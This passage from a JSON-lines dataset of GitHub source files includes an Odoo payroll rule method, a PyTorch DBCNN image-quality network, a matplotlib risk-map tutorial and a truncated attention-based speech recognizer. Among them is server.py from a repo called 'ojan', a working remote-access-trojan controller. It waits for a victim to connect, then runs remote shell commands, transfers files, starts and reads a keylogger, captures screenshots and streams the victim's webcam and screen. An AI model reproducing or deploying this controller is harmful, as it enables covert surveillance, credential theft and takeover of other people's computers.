rule.amount_fix,\n 'amount_python_compute': rule.amount_python_compute,\n 'amount_percentage': rule.amount_percentage,\n 'amount_percentage_base': rule.amount_percentage_base,\n 'register_id': rule.register_id.id,\n 'amount': amount,\n 'employee_id': contract.employee_id.id,\n 'quantity': qty,\n 'rate': rate,\n }\n else:\n #blacklist this rule and its children\n blacklist += [id for id, seq in rule._recursive_search_of_rules()]\n\n for item in list(result_dict.values()):\n res.append(item)\n return res","repo_name":"alkhatim905/Tools","sub_path":"alkhatim776/dareed15-master/employee_kpi/models/hr_payslip_inherit.py","file_name":"hr_payslip_inherit.py","file_ext":"py","file_size_in_byte":9008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"17347291626","text":"import torch.nn as nn\nfrom torchvision import models\nimport torch\nimport torch.nn.functional as F\nfrom SCNN import SCNN\n\n\nclass DBCNN(nn.Module):\n\n def __init__(self, config):\n \"\"\"Declare all needed layers.\"\"\"\n nn.Module.__init__(self)\n # Convolution and pooling layers of VGG-16.\n self.features1 = models.vgg16(pretrained=True).features\n self.features1 = nn.Sequential(*list(self.features1.children())[:-1])\n\n scnn = 
SCNN()\n        scnn = torch.nn.DataParallel(scnn).cuda()\n\n        scnn.load_state_dict(torch.load(config.scnn_root))\n        self.features2 = scnn.module.features\n\n        # fix: forward() branches on self.config.std_modeling, so keep the config around\n        self.config = config\n\n        # Linear classifier.\n\n        if config.std_modeling:\n            outdim = 2\n        else:\n            outdim = 1\n\n        self.fc = nn.Linear(512 * 128, outdim)\n\n        if config.fc:\n            # Freeze all previous layers.\n            for param in self.features1.parameters():\n                param.requires_grad = False\n            for param in self.features2.parameters():\n                param.requires_grad = False\n            # Initialize the fc layers.\n            nn.init.kaiming_normal_(self.fc.weight.data)\n            if self.fc.bias is not None:\n                nn.init.constant_(self.fc.bias.data, val=0)\n\n    def forward(self, X):\n        \"\"\"Forward pass of the network.\n        \"\"\"\n        N = X.size()[0]\n        X1 = self.features1(X)\n        H = X1.size()[2]\n        W = X1.size()[3]\n        assert X1.size()[1] == 512\n        X2 = self.features2(X)\n        H2 = X2.size()[2]\n        W2 = X2.size()[3]\n        assert X2.size()[1] == 128\n\n        if (H != H2) | (W != W2):\n            X2 = F.upsample_bilinear(X2, (H, W))\n\n        X1 = X1.view(N, 512, H * W)\n        X2 = X2.view(N, 128, H * W)\n        X = torch.bmm(X1, torch.transpose(X2, 1, 2)) / (H * W)  # Bilinear\n        assert X.size() == (N, 512, 128)\n        X = X.view(N, 512 * 128)\n        X = torch.sqrt(X + 1e-8)\n        X = torch.nn.functional.normalize(X)\n        X = self.fc(X)\n        # outdim is 2 with std modeling (mean, t) and 1 otherwise\n        assert X.size() == (N, self.fc.out_features)\n\n        if self.config.std_modeling:\n            mean = X[:, 0]\n            t = X[:, 1]\n            var = nn.functional.softplus(t)\n            return mean, var\n        else:\n            return X\n","repo_name":"zwx8981/UNIQUE","sub_path":"DBCNN.py","file_name":"DBCNN.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"34"} +{"seq_id":"2559863974","text":"import socket\nimport json\nimport os\nimport struct\nimport pickle\nimport cv2\n\n#setup ip and port\nhostIP = '192.168.1.10'\nconnPort = 9981\nwebcamPort = 9998\nscreenPort = 9988\n\nsoc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsoc.bind((hostIP, connPort))\nprint('Waiting for connection...')\nsoc.listen(5) #set target\n\nconn = soc.accept()\n_target = conn[0]\nip = conn[1]\nprint(_target)\nprint(f'Connected to {str(ip)}')\n\ndef data_receive():\n    data = ''\n    while True:\n        try:\n            data = data + _target.recv(1024).decode().rstrip()\n            return json.loads(data)\n        except ValueError:\n            continue\n\ndef download_file(fileName):\n    file = open(fileName, 'wb')\n    _target.settimeout(5)\n    _file = _target.recv(1024)\n    while _file:\n        file.write(_file)\n        try:\n            _file = _target.recv(1024)\n        except socket.timeout as e:\n            break\n    _target.settimeout(None)\n    file.close()\n\ndef upload_file(fileName):\n    file = open(fileName, 'rb')\n    _target.send(file.read())\n    file.close()\n\ndef cam_record():\n    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    sock.bind((hostIP, webcamPort))\n    sock.listen(5) #set target\n    cn = sock.accept()\n    target = cn[0]\n    ip = cn[1]\n    print(f'Making connection to {str(ip)} webcam ...')\n\n    byteData = b\"\"\n    payloadSize = struct.calcsize(\"Q\")\n\n    while True:\n        while (len(byteData)) < payloadSize:\n            packet = target.recv(4*1024)\n            if not packet: break\n            byteData += packet\n\n        packed_msg_size = byteData[:payloadSize]\n        byteData = byteData[payloadSize:]\n        msg_size = struct.unpack(\"Q\", packed_msg_size)[0]\n        while len(byteData) < msg_size:\n            byteData += target.recv(4*1024)\n        frame_data = byteData[:msg_size]\n        byteData = byteData[msg_size:]\n        frame = pickle.loads(frame_data)\n        cv2.imshow(\"Recording ...\", frame)\n        key = cv2.waitKey(1)\n        if key == 27:\n            break\n    target.close()\n    cv2.destroyAllWindows()\n\ndef record_screen():\n    sock = 
socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.bind((hostIP, screenPort))\n sock.listen(5) #set target\n cn = sock.accept()\n target = cn[0]\n ip = cn[1]\n print(f'Making connection to {str(ip)} screen ...')\n\n byteData = b\"\"\n payloadSize = struct.calcsize(\"i\")\n\n while True:\n while (len(byteData)) < payloadSize:\n packet = target.recv(1024)\n if not packet: break\n byteData += packet\n \n packed_msg_size = byteData[:payloadSize]\n byteData = byteData[payloadSize:]\n msg_size = struct.unpack(\"i\", packed_msg_size)[0]\n while len(byteData) < msg_size:\n byteData += target.recv(1024)\n frame_data = byteData[:msg_size]\n byteData = byteData[msg_size:]\n frame = pickle.loads(frame_data)\n cv2.imshow(\"Recording screen...\", frame)\n key = cv2.waitKey(1)\n if key == 27:\n break\n target.close()\n cv2.destroyAllWindows()\n\n \ndef shell_communication():\n n = 0\n while True:\n cmd = input('OJAN>> ')\n data = json.dumps(cmd)\n _target.send(data.encode())\n if cmd in ('exit', 'quit'):\n break\n elif cmd == 'clear':\n os.system('clear')\n elif cmd[:3] == 'cd ':\n pass\n elif cmd[:8] == 'download':\n download_file(cmd[9:])\n elif cmd[:6] == 'upload':\n upload_file(cmd[7:])\n elif cmd == 'kaylog':\n pass\n elif cmd == 'readlogger':\n data = _target.recv(1024).decode()\n print(data)\n elif cmd == 'stoplogger':\n pass\n elif cmd == 'startcam':\n cam_record()\n elif cmd == 'screenshot':\n n += 1\n file = open(\"ss\"+str(n)+\".png\", 'wb')\n _target.settimeout(5)\n _file = _target.recv(1024)\n while _file:\n file.write(_file)\n try:\n _file = _target.recv(1024)\n except socket.timeout as e:\n break\n _target.settimeout(None)\n file.close()\n elif cmd == 'sharescreen':\n record_screen()\n else:\n result = data_receive()\n print(result)\n \nshell_communication()","repo_name":"rzpjunior/ojan","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"12232512132","text":"# -*- coding: utf-8 -*-\n\"\"\"\nRISK MAPS\n\n@author: Miia Chabot\n\"\"\"\nimport seaborn as sns\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n#HEATMAP, Exercise 1.-------------------------------------------------------------\n# Create a dataset\ndf = pd.DataFrame(np.random.random((5,5)), columns=[\"a\",\"b\",\"c\",\"d\",\"e\"])\n# numpy.random.random() is one of the function for doing random sampling in numpy. 
\n#It returns an array of specified shape and fills it with random floats in the half-open interval [0.0, 1.0).\n\n\n# Default heatmap ------- plot first heatmap\np1 = sns.heatmap(df)\n\n\n#Exercise2-----------------------------------Measuring Correlations-------------------\n# Create a dataset\ndf = pd.DataFrame(np.random.random((100,5)), columns=[\"a\",\"b\",\"c\",\"d\",\"e\"])\n \n# Calculate correlation between each pair of variable\ncorr_matrix=df.corr() # gives me matrix 5/5\n \n# plot it\nsns.heatmap(corr_matrix, cmap='PuOr')\n# cmap='PuOr' : for color option\n#Change it \n# https://matplotlib.org/stable/gallery/color/colormap_reference.html\nsns.heatmap(corr_matrix, cmap='seismic')\n\n\n#Exercise 3.----------------------------------------------------------------------\n#HALF CORRELATION MATRIX\nimport seaborn as sns\nimport pandas as pd\nimport numpy as np\nnp.random.seed(0)\n \n# Create a dataset\ndf = pd.DataFrame(np.random.random((100,5)), columns=[\"a\",\"b\",\"c\",\"d\",\"e\"])\n\n# Calculate correlation between each pair of variable\ncorr_matrix=df.corr()\n \n# Can be great to plot only a half matrix\n# Generate a mask for the upper triangle\nmask = np.zeros_like(corr_matrix)\nmask[np.triu_indices_from(mask)] = True\n\n# Draw the heatmap with the mask\nsns.heatmap(corr_matrix, mask=mask, square=True, cmap='rainbow')\n\n\n#Exercise 4.---------------------------------------------------------------------\n \n# Create a dataset\ndf = pd.DataFrame(np.random.random((10,10)), columns=[\"a\",\"b\",\"c\",\"d\",\"e\",\"f\",\"g\",\"h\",\"i\",\"j\"])\n\n# plot a heatmap with annotation\nsns.heatmap(df, cmap='rainbow', annot=True, annot_kws={\"size\": 7})\n\n#Exercise 5--------------------------------------------------------------------------\n\nimport matplotlib.pyplot as plt\n\ncolumn_labels = list('ABC')\nrow_labels = list('WXYZ')\ndata = np.array([[1, 2, 3], [0, 3, 2], [1, 2, 3], [4, 3, 2]]) \nfig, axis = plt.subplots() \nheatmap = axis.pcolor(data, cmap=plt.cm.Greens)\nplt.savefig('test.png')\nplt.show() \n\n#Exercise 6 -------------------------------------------real case study------------\ncolumn_labels = list('ABC') \nrow_labels = list('WXYZ')\ndata = np.array([[1, 2, 3], [0, 3, 2], [1, 2, 3], [4, 3, 2]])\nfig, axis = plt.subplots() \nheatmap = axis.pcolor(data, cmap='rainbow') \nplt.savefig('test.png')\nplt.show() \n\n#Real-case Study: your first RISK MAP------------------------------------------\n#Step 1--------------\n#Using Diverging colormaps and selecting red, yellow, green\ncolumn_labels = list('ABC') \nrow_labels = list('WXY')\ndata = np.array([[4, 4, 3], [4, 3, 2], [3, 2, 2]])\nfig, axis = plt.subplots() \n#axis.axis(\"off\")\nheatmap = axis.pcolor(data, cmap='RdYlGn') \nplt.savefig('test.png')\nplt.show() \n\n#Making it bigger\ndata = np.array([[4, 4, 2,1], [4, 2, 1,2], [2,1, 2,0], [1, 2, 0,0]])\nfig, axis = plt.subplots()\n#axis.axis(\"off\")\nheatmap = axis.pcolor(data, cmap='RdYlGn') \nplt.savefig('test.png')\nplt.show() \n\n#choosing different colormaps\ndata = np.array([[4, 4, 2,1], [4, 2, 1,2], [2,1, 2,0], [1, 2, 0,0]])\nfig, axis = plt.subplots()\naxis.axis(\"off\")\nheatmap = axis.pcolor(data, cmap='coolwarm') \nplt.savefig('test.png')\nplt.show() \n\n#Purple_Green\ndata = np.array([[4, 4, 2,1], [4, 2, 1,2], [2,1, 2,0], [1, 2, 0,0]])\nfig, axis = plt.subplots()\naxis.axis(\"off\")\nheatmap = axis.pcolor(data, cmap='PRGn') \nplt.savefig('test.png')\nplt.show() \n\n#STep 2, the scatterplot--------------------------------\n\ny = [0.2, 
0.4,0.4,2.5,1.5,1.4,1.9,0.95,1,1.3,1.6,1.92,2.7,0.5,1.6,1.8,2.2,2.7,2.5,2.3]\nx = [0.9, 0.9,2.7,0.2,0.1,0.3,0.85,1.3,1.8,1.82,1.5,1.82,1.98,2.3,2.6,2.3,2.7,2.1,0.7,0.9]\nn = [12,8,14,20,11,19,7,13,17,5,4,15,6,18,10,3,16,2,1,9]\n\nfig, ax = plt.subplots()\nax.scatter(x, y)\n\nfor i, txt in enumerate(n):\n ax.annotate(txt, (x[i], y[i]))\n \n# 3x3 RISK MAP: FINAL STEP------------------------------------------------------------ \n# Insert your scatterplot in your map\n\n#The map\ndata = np.array([[4, 4, 3], [4, 3, 2], [3, 2, 2]])\naxis.hlines([1, 2, 3], *axis.get_xlim())\naxis.vlines([1, 2, 3], *axis.get_xlim())\n\n# The scatterplot (do not place your dots on the grid)\ny = [0.2, 0.4,0.4,2.5,1.5,1.4,1.8,0.8,1.1,1.4,1.6,1.8,2.7,0.5,1.6,1.8,2.2,2.7,2.5,2.3]\nx = [0.9, 0.9,2.7,0.2,0.1,0.3,0.8,1.3,1.8,1.82,1.5,1.82,1.9,2.3,2.6,2.3,2.7,2.1,0.7,0.85]\nn = [12,8,14,20,11,19,7,13,17,5,4,15,6,18,10,3,16,2,1,9]\n\nfig, axis = plt.subplots()\n#axis.axis(\"off\")\nheatmap = axis.pcolor(data, cmap='RdYlGn') \naxis.scatter(x, y, c=\"grey\", alpha=0.5 )\naxis.hlines([1, 2, 3], *axis.get_xlim(), linestyles ='dotted',lw=1.5, color='grey')\naxis.vlines([1, 2, 3], *axis.get_xlim(),linestyles ='dotted',lw=1.5, color='grey')\n\nplt.title(\"Risk Map\",size=12, fontname=\"Calibri\")\nplt.xlabel(\"Severity\", size=10, fontname=\"Calibri\")\nplt.ylabel(\"Frequency\", size=10, fontname=\"Calibri\")\n\nfor i, txt in enumerate(n):\n axis.annotate(txt, (x[i], y[i]),xytext=(x[i]+0.03, y[i]+0.04))\n\nplt.savefig('test.png')\nplt.show() \n\n#Using Your own Excel-----------------------------------------------------------------\n\ndf = pd.read_excel(\"C:/Users/Miia CHABOT/Desktop/Data/Data_Heatmap.xlsx\")\ndata = np.array([[4, 4, 3], [4, 3, 2], [3, 2, 2]])\nn = df['N'].to_list()\nx = df['X'].to_list()\ny = df['Y'].to_list()\n\nfig, axis = plt.subplots()\naxis.axis(\"off\")\nheatmap = axis.pcolor(data, cmap='RdYlGn')\naxis.vlines([1, 2, 3], *axis.get_xlim(), linestyles ='dotted', lw=1.5, color ='grey')\naxis.hlines([1, 2, 3], *axis.get_xlim(), linestyles ='dotted', lw=1.5, color ='grey')\naxis.scatter(x, y, c='grey',alpha=0.5)\n\nfor i, txt in enumerate(n):\n axis.annotate(txt, (x[i], y[i]),xytext =(x[i]+0.03, y[i]+0.04))\n\nplt.savefig('test.png')\nplt.show() \n \n# end file\n# end end\n","repo_name":"waelbousselmi/correction_cours_python_4A_2023","sub_path":"f_Python_Course5_modif.py","file_name":"f_Python_Course5_modif.py","file_ext":"py","file_size_in_byte":6025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"45894604541","text":"import torch \nimport torch.nn.functional as F\nfrom torch.nn.utils.rnn import pack_padded_sequence\nfrom torch.nn.utils.rnn import pad_packed_sequence\nfrom torch.nn.utils.rnn import pad_sequence\nimport numpy as np\nfrom utils import cc\nfrom utils import pad_list\nfrom utils import _seq_mask\nfrom utils import _inflate\nfrom utils import _inflate_np\nfrom utils import weight_init\nfrom torch.distributions.categorical import Categorical\nimport os\nimport copy\n\ndef _get_vgg2l_odim(idim, in_channel=1, out_channel=128):\n idim = idim / in_channel\n idim = np.ceil(np.array(idim, dtype=np.float32) / 2)\n idim = np.ceil(np.array(idim, dtype=np.float32) / 2)\n return int(idim) * out_channel\n\ndef _pad_one_frame(inp):\n inp_t = inp.transpose(1, 2)\n out_t = F.pad(inp_t, (0, 1), mode='replicate')\n out = out_t.transpose(1, 2)\n return out\n\nclass VGG2L(torch.nn.Module):\n def __init__(self, in_channel=1):\n super(VGG2L, self).__init__()\n 
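# editor's note - shape sketch (assuming 83-dim fbank features, in_channel=1):\n        # (B, T, 83) -> view/transpose -> (B, 1, T, 83) -> block1 -> (B, 64, ceil(T/2), 42)\n        # -> block2 -> (B, 128, ceil(T/4), 21) -> flatten -> (B, ceil(T/4), 128 * 21),\n        # which is what _get_vgg2l_odim above and the ceil-divided ilens in forward() track\n        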
self.in_channel = in_channel\n self.conv1_1 = torch.nn.Conv2d(in_channel, 64, 3, stride=1, padding=1)\n self.conv1_2 = torch.nn.Conv2d(64, 64, 3, stride=1, padding=1)\n self.conv2_1 = torch.nn.Conv2d(64, 128, 3, stride=1, padding=1)\n self.conv2_2 = torch.nn.Conv2d(128, 128, 3, stride=1, padding=1)\n\n def conv_block(self, inp, layers):\n out = inp\n for layer in layers:\n out = F.relu(layer(out))\n out = F.max_pool2d(out, 2, stride=2, ceil_mode=True)\n return out\n\n def forward(self, xs, ilens):\n # xs = [batch_size, frames, feeature_dim]\n # ilens is a list of frame length of each utterance \n xs = torch.transpose(\n xs.view(xs.size(0), xs.size(1), self.in_channel, xs.size(2)//self.in_channel), 1, 2)\n xs = self.conv_block(xs, [self.conv1_1, self.conv1_2])\n xs = self.conv_block(xs, [self.conv2_1, self.conv2_2])\n ilens = np.array(np.ceil(np.array(ilens, dtype=np.float32) / 2), dtype=np.int64) \n ilens = np.array(np.ceil(np.array(ilens, dtype=np.float32) / 2), dtype=np.int64).tolist()\n xs = torch.transpose(xs, 1, 2)\n xs = xs.contiguous().view(xs.size(0), xs.size(1), xs.size(2) * xs.size(3))\n return xs, ilens\n\nclass pBLSTM(torch.nn.Module):\n def __init__(self, input_dim, hidden_dim, n_layers, subsample, dropout_rate):\n super(pBLSTM, self).__init__()\n layers, project_layers = [], []\n for i in range(n_layers):\n #idim = input_dim if i == 0 else hidden_dim\n idim = input_dim if i == 0 else hidden_dim\n project_dim = hidden_dim * 4 if subsample[i] > 1 else hidden_dim * 2\n\n layers.append(torch.nn.LSTM(idim, hidden_dim, num_layers=1,\n bidirectional=True, batch_first=True))\n\n project_layers.append(torch.nn.Linear(project_dim, hidden_dim))\n self.layers = torch.nn.ModuleList(layers)\n self.project_layers = torch.nn.ModuleList(project_layers)\n self.dropout_layer = torch.nn.Dropout(p=dropout_rate)\n self.subsample = subsample\n\n def forward(self, xpad, ilens):\n for i, (layer, project_layer) in enumerate(zip(self.layers, self.project_layers)):\n # pack sequence \n xs_pack = pack_padded_sequence(xpad, ilens, batch_first=True)\n ys, (_, _) = layer(xs_pack)\n ys_pad, ilens = pad_packed_sequence(ys, batch_first=True)\n ys_pad = self.dropout_layer(ys_pad)\n ilens = ilens.numpy()\n # subsampling\n sub = self.subsample[i]\n if sub > 1:\n # pad one frame\n if ys_pad.size(1) % 2 == 1:\n ys_pad = F.pad(ys_pad.transpose(1, 2), (0, 1), mode='replicate').transpose(1, 2)\n # concat two frames\n ys_pad = ys_pad.contiguous().view(ys_pad.size(0), ys_pad.size(1) // 2, ys_pad.size(2) * 2)\n ilens = [(length + 1) // sub for length in ilens]\n projected = project_layer(ys_pad)\n xpad = F.relu(projected)\n xpad = self.dropout_layer(xpad)\n # type to list of int\n ilens = np.array(ilens, dtype=np.int64).tolist()\n return xpad, ilens\n\nclass Encoder(torch.nn.Module):\n def __init__(self, input_dim, hidden_dim, n_layers, subsample, dropout_rate, in_channel=1):\n super(Encoder, self).__init__()\n #self.enc1 = VGG2L(in_channel)\n #out_channel = _get_vgg2l_odim(input_dim)\n\n self.enc2 = pBLSTM(input_dim=input_dim, hidden_dim=hidden_dim, \n n_layers=n_layers, subsample=subsample, dropout_rate=dropout_rate)\n\n def forward(self, x, ilens):\n #out, ilens = self.enc1(x, ilens)\n out, ilens = self.enc2(x, ilens)\n return out, ilens\n\nclass AttLoc(torch.nn.Module):\n def __init__(self, encoder_dim, decoder_dim, att_dim, conv_channels, conv_kernel_size, att_odim):\n super(AttLoc, self).__init__()\n self.mlp_enc = torch.nn.Linear(encoder_dim, att_dim)\n self.mlp_dec = torch.nn.Linear(decoder_dim, att_dim, 
bias=False)\n self.mlp_att = torch.nn.Linear(conv_channels, att_dim, bias=False)\n self.loc_conv = torch.nn.Conv2d(1, conv_channels, (1, 2 * conv_kernel_size + 1), \n padding=(0, conv_kernel_size), bias=False)\n self.gvec = torch.nn.Linear(att_dim, 1, bias=False)\n self.mlp_o = torch.nn.Linear(encoder_dim, att_odim)\n\n self.encoder_dim = encoder_dim\n self.decoder_dim = decoder_dim\n self.att_dim = att_dim\n self.att_odim = att_odim\n self.conv_channels = conv_channels\n self.enc_length = None\n self.enc_h = None\n self.pre_compute_enc_h = None\n\n def reset(self):\n self.enc_length = None\n self.enc_h = None\n self.pre_compute_enc_h = None\n\n def forward(self, enc_pad, enc_len, dec_z, att_prev, scaling=2.0):\n batch_size =enc_pad.size(0)\n if self.pre_compute_enc_h is None:\n self.enc_h = enc_pad\n self.enc_length = self.enc_h.size(1)\n self.pre_compute_enc_h = self.mlp_enc(self.enc_h)\n\n if dec_z is None:\n dec_z = enc_pad.new_zeros(batch_size, self.decoder_dim)\n else:\n dec_z = dec_z.view(batch_size, self.decoder_dim)\n\n if att_prev is None:\n # initialize attention weights to uniform\n att_prev = pad_list([self.enc_h.new(l).fill_(1.0 / l) for l in enc_len], 0)\n\n #att_prev: batch_size x frame\n att_conv = self.loc_conv(att_prev.view(batch_size, 1, 1, self.enc_length))\n # att_conv: batch_size x channel x 1 x frame -> batch_size x frame x channel\n att_conv = att_conv.squeeze(2).transpose(1, 2)\n # att_conv: batch_size x frame x channel -> batch_size x frame x att_dim\n att_conv = self.mlp_att(att_conv)\n\n # dec_z_tiled: batch_size x 1 x att_dim\n dec_z_tiled = self.mlp_dec(dec_z).view(batch_size, 1, self.att_dim)\n att_state = torch.tanh(self.pre_compute_enc_h + dec_z_tiled + att_conv)\n e = self.gvec(att_state).squeeze(2)\n # w: batch_size x frame\n w = F.softmax(scaling * e, dim=1)\n # w_expanded: batch_size x 1 x frame\n w_expanded = w.unsqueeze(1)\n #c = torch.sum(self.enc_h * w_expanded, dim=1)\n c = torch.bmm(w_expanded, self.enc_h).squeeze(1)\n c = self.mlp_o(c)\n return c, w\n\nclass MultiHeadAttLoc(torch.nn.Module):\n def __init__(self, encoder_dim, decoder_dim, att_dim, conv_channels, conv_kernel_size, heads, att_odim):\n super(MultiHeadAttLoc, self).__init__()\n self.heads = heads\n self.mlp_enc = torch.nn.ModuleList([torch.nn.Linear(encoder_dim, att_dim) for _ in range(self.heads)])\n self.mlp_dec = torch.nn.ModuleList([torch.nn.Linear(decoder_dim, att_dim, bias=False) \\\n for _ in range(self.heads)])\n self.mlp_att = torch.nn.ModuleList([torch.nn.Linear(conv_channels, att_dim, bias=False) \\\n for _ in range(self.heads)])\n self.loc_conv = torch.nn.ModuleList([torch.nn.Conv2d(\n 1, conv_channels, (1, 2 * conv_kernel_size + 1), \n padding=(0, conv_kernel_size), bias=False) for _ in range(self.heads)])\n self.gvec = torch.nn.ModuleList([torch.nn.Linear(att_dim, 1, bias=False) for _ in range(self.heads)])\n self.mlp_o = torch.nn.Linear(self.heads * encoder_dim, att_odim)\n\n self.encoder_dim = encoder_dim\n self.decoder_dim = decoder_dim\n self.att_dim = att_dim\n self.conv_channels = conv_channels\n self.enc_length = None\n self.enc_h = None\n self.pre_compute_enc_h = None\n\n def reset(self):\n self.enc_length = None\n self.enc_h = None\n self.pre_compute_enc_h = None\n\n def forward(self, enc_pad, enc_len, dec_z, att_prev, scaling=2.0):\n batch_size =enc_pad.size(0)\n if self.pre_compute_enc_h is None:\n self.enc_h = enc_pad\n self.enc_length = self.enc_h.size(1)\n self.pre_compute_enc_h = [self.mlp_enc[h](self.enc_h) for h in range(self.heads)]\n\n if dec_z is 
None:\n dec_z = enc_pad.new_zeros(batch_size, self.decoder_dim)\n else:\n dec_z = dec_z.view(batch_size, self.decoder_dim)\n\n # initialize attention weights to uniform\n if att_prev is None:\n att_prev = []\n for h in range(self.heads):\n att_prev += [pad_list([self.enc_h.new(l).fill_(1.0 / l) for l in enc_len], 0)]\n\n cs, ws = [], []\n for h in range(self.heads):\n #att_prev: batch_size x frame\n att_conv = self.loc_conv[h](att_prev[h].view(batch_size, 1, 1, self.enc_length))\n # att_conv: batch_size x channel x 1 x frame -> batch_size x frame x channel\n att_conv = att_conv.squeeze(2).transpose(1, 2)\n # att_conv: batch_size x frame x channel -> batch_size x frame x att_dim\n att_conv = self.mlp_att[h](att_conv)\n\n # dec_z_tiled: batch_size x 1 x att_dim\n dec_z_tiled = self.mlp_dec[h](dec_z).view(batch_size, 1, self.att_dim)\n att_state = torch.tanh(self.pre_compute_enc_h[h] + dec_z_tiled + att_conv)\n e = self.gvec[h](att_state).squeeze(2)\n # w: batch_size x frame\n w = F.softmax(scaling * e, dim=1)\n ws.append(w)\n # w_expanded: batch_size x 1 x frame\n w_expanded = w.unsqueeze(1)\n #c = torch.sum(self.enc_h * w_expanded, dim=1)\n c = torch.bmm(w_expanded, self.enc_h).squeeze(1)\n cs.append(c)\n c = self.mlp_o(torch.cat(cs, dim=1))\n return c, ws \n\n#class StateTransform(torch.nn.Module):\n# def __init__(self, idim, odim):\n# super(StateTransform, self).__init__()\n# self.fcz = torch.nn.Linear(idim, odim)\n# self.fcc = torch.nn.Linear(idim, odim)\n#\n# def forward(self, z):\n# dec_init_z = self.fcz(z)\n# dec_init_c = self.fcc(z)\n# return dec_init_z, dec_init_c\n\nclass Decoder(torch.nn.Module):\n def __init__(self, output_dim, embedding_dim, hidden_dim, attention, att_odim, \n dropout_rate, bos, eos, pad, ls_weight=0, labeldist=None):\n super(Decoder, self).__init__()\n self.bos, self.eos, self.pad = bos, eos, pad\n self.embedding = torch.nn.Embedding(output_dim, embedding_dim, padding_idx=pad)\n self.LSTMCell = torch.nn.LSTMCell(embedding_dim + att_odim, hidden_dim)\n self.output_layer = torch.nn.Linear(hidden_dim + att_odim, output_dim)\n self.dropout_layer = torch.nn.Dropout(p=dropout_rate)\n self.attention = attention\n\n self.hidden_dim = hidden_dim\n self.att_odim = att_odim\n self.dropout_rate = dropout_rate\n\n # label smoothing hyperparameters\n self.ls_weight = ls_weight\n self.labeldist = labeldist\n if labeldist is not None:\n self.vlabeldist = cc(torch.from_numpy(np.array(labeldist, dtype=np.float32)))\n\n def zero_state(self, enc_pad, dim=None):\n if not dim:\n return enc_pad.new_zeros(enc_pad.size(0), self.hidden_dim)\n else:\n return enc_pad.new_zeros(enc_pad.size(0), dim)\n\n def forward_step(self, emb, dec_z, dec_c, c, w, enc_pad, enc_len):\n cell_inp = torch.cat([emb, c], dim=-1)\n cell_inp = self.dropout_layer(cell_inp)\n dec_z, dec_c = self.LSTMCell(cell_inp, (dec_z, dec_c))\n\n # run attention module\n c, w = self.attention(enc_pad, enc_len, dec_z, w)\n output = torch.cat([dec_z, c], dim=-1)\n #output = self.dropout_layer(output)\n #output = F.dropout(output, self.dropout_rate)\n logit = self.output_layer(output)\n return logit, dec_z, dec_c, c, w\n\n def forward(self, enc_pad, enc_len, ys=None, tf_rate=1.0, max_dec_timesteps=500, \n sample=False, smooth=False, scaling=1.0, label_smoothing=True):\n batch_size = enc_pad.size(0)\n if ys is not None:\n # prepare input and output sequences\n bos = ys[0].data.new([self.bos])\n eos = ys[0].data.new([self.eos])\n ys_in = [torch.cat([bos, y], dim=0) for y in ys]\n ys_out = [torch.cat([y, eos], dim=0) for y in ys]\n 
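# editor's sketch: for y = [5, 6, 7] with bos=1, eos=2 this builds\n            # ys_in = [1, 5, 6, 7] (decoder inputs) and ys_out = [5, 6, 7, 2] (targets),\n            # i.e. the standard one-step-shifted teacher-forcing pair\n            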
pad_ys_in = pad_list(ys_in, pad_value=self.eos)\n            pad_ys_out = pad_list(ys_out, pad_value=self.eos)\n            # get length info\n            batch_size, olength = pad_ys_out.size(0), pad_ys_out.size(1)\n            # map idx to embedding\n            eys = self.embedding(pad_ys_in)\n\n        # initialization\n        dec_c = self.zero_state(enc_pad)\n        dec_z = self.zero_state(enc_pad)\n        c = self.zero_state(enc_pad, dim=self.att_odim)\n\n        w = None\n        logits, prediction, ws = [], [], []\n        # reset the attention module\n        self.attention.reset()\n\n        # loop for each timestep\n        olength = max_dec_timesteps if not ys else olength\n        for t in range(olength):\n            # supervised learning: using teacher forcing\n            if ys is not None:\n                # teacher forcing\n                tf = True if np.random.random_sample() <= tf_rate else False\n                emb = eys[:, t, :] if tf or t == 0 else self.embedding(prediction[-1])\n            # else, label the data with greedy\n            else:\n                if t == 0:\n                    bos = cc(torch.Tensor([self.bos for _ in range(batch_size)]).type(torch.LongTensor))\n                    emb = self.embedding(bos)\n                else:\n                    # using argmax\n                    if not smooth:\n                        emb = self.embedding(prediction[-1])\n                    # smooth approximation of embedding\n                    else:\n                        emb = F.softmax(logit * scaling, dim=-1) @ self.embedding.weight\n            logit, dec_z, dec_c, c, w = \\\n                self.forward_step(emb, dec_z, dec_c, c, w, enc_pad, enc_len)\n\n            ws.append(w)\n            logits.append(logit)\n            if not sample:\n                prediction.append(torch.argmax(logit, dim=-1))\n            else:\n                sampled_indices = Categorical(logits=logit).sample() \n                prediction.append(sampled_indices)\n\n        logits = torch.stack(logits, dim=1)\n        log_probs = F.log_softmax(logits, dim=2)\n        prediction = torch.stack(prediction, dim=1)\n        ws = torch.stack(ws, dim=1)\n\n        if ys:\n            ys_log_probs = torch.gather(log_probs, dim=2, index=pad_ys_out.unsqueeze(2)).squeeze(2)\n        else:\n            ys_log_probs = torch.gather(log_probs, dim=2, index=prediction.unsqueeze(2)).squeeze(2)\n\n        # label smoothing\n        if label_smoothing and self.ls_weight > 0 and self.training:\n            loss_reg = torch.sum(log_probs * self.vlabeldist, dim=2)\n            ys_log_probs = (1 - self.ls_weight) * ys_log_probs + self.ls_weight * loss_reg\n        return logits, ys_log_probs, prediction, ws\n\n    def recognize_beams(self, enc_pad, enc_len, max_dec_timesteps, topk):\n        # NOTE: the beam search below is left unfinished in the original source; the\n        # loop at the end only steps the decoder and never scores or backtracks.\n        batch_size = enc_pad.size(0)\n\n        # initialization\n        dec_c = _inflate(self.zero_state(enc_pad), times=topk, dim=0)\n        dec_z = _inflate(self.zero_state(enc_pad), times=topk, dim=0)\n        c = _inflate(self.zero_state(enc_pad, dim=self.att_odim), times=topk, dim=0)\n\n        w = None\n\n        